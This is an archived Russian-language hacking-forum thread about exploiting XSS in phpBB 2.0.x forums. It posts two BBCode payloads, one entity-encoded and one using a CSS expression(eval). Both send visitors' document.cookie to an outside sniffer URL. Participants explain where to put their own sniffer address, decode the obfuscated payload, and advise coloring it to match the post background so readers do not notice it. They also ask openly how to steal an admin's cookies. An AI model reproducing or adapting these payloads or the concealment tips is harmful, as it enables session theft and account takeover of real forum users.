Просмотр полной версии : Exploit в phpbb 2.0.16
{BuT@Min}
01.12.2006, 02:33
[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]
и вот
[*color=#EFEFEF][*url]www.ut[*url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
Стоит phpbb 2.0.16 а вопрос заключается в следующем... как Exploit подготовить к работе??
Ну насчёт первого мне интересна а где тама адрес снифера прописывать,а по поводу 2 я его испробывал но почему та куки не пришли(на себе испытавал ) :(
Это XSS. в первом адрес снифера:
#58;&+#117;&+#114;&+#108;&+#40;&+
#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+
#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+
#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+
#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+
#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+
#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+
#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+
#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+
#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+
#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+
#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+
#103;&+#63;&+#34;+document.cookie
А ты звездочки убирал?
{BuT@Min}
01.12.2006, 02:42
Во втором?- да убирал
Это XSS. в первом адрес снифера:
#58;&+#117;&+#114;&+#108;&+#40;&+
#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+
#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+
#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+
#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+
#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+
#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+
#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+
#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+
#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+
#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+
#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+
#103;&+#63;&+#34;+document.cookie
Что то я не совсем понял и где этот снифер находится ... Заранее извиняюсь за глупые вопросы(может быть) :D
закодировано тут вот, что :url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie можешь воспользоваться декодером тут _http://webmastertools.narod.ru/OnlineTools/unicode_decode.html
MegaBits
01.12.2006, 11:09
А вместо этого http://wj.com/ должен быть написан адрес форума с которого хочу стащить куки? И еще эти XSS на phpBB 2.0.13 прокатят?
А вместо этого http://wj.com/ должен быть написан адрес форума с которого хочу стащить куки? И еще эти XSS на phpBB 2.0.13 прокатят?
ничего в этой XSS менять кроме адреса снифера не нужно...просто постишь на форуме и ловишь куки, помоему эта XSS катит до версии 2.0.18 (включая).
{BuT@Min}
01.12.2006, 21:13
Подписался на расылку снифера и нифига он что не шлёт --
Вы имеете возможность получать на ваш e-mail логи сниффера в режиме реального времени. Отсылка лога в почтовый ящик происходит сразу, как только сниффер примет информацию.
филтр на рефер указал в чём проблема?? :confused: (проверял заходил по хсс сам) как можна свой сниффер зделать????
MegaBits
02.12.2006, 00:17
Может страничку с Xss которую ты создал еще никто не просмотрел и поэтому куки не пришли?
Здраствуйте. У меня есть к вам 2 вопроса
1, Где можно скачать файлик и установить у тебя на хсоте чтобы он туда тянул кукисы
2, Если поставить данный код в сообщение в топике то он вить будет отображся так сказать открытым. Тоесть как текст.
И также будут видны надписи куки и урл.
Как быть подскажите. Или я чтото не то делаю ?
аська 491104
1. Ищи на форуме по запросу "сниффер". Их тут много должно быть
2. Перед и после кода XSS поставь тэги цвета фона форума. (точнее фона поста.)
[c*olor=#RRGGBB]Здесь твоя ХССка[/c*olor]
где RRGGBB - цвет в формате Red Green Blue.
Твоя ХССка так и так будет открыта, но будет не видна в посте, и вряд ли ее заметят.
Там стоят два тега[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background:u&#
Я так понемаю первый можно убрать
[UR*L]http://www.
и в конце тоже один.или этого делат нельзя?
итакой вопрос ещё есть я вот хочю свой сниффер подставить. Где можно утилиту взять чтобы в unicode обратно переделать ?
MegaBits
16.12.2006, 13:05
Как можно стырять куки если админ пользуется Оперой или Мозилой, форум phpbb 2.0.13?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot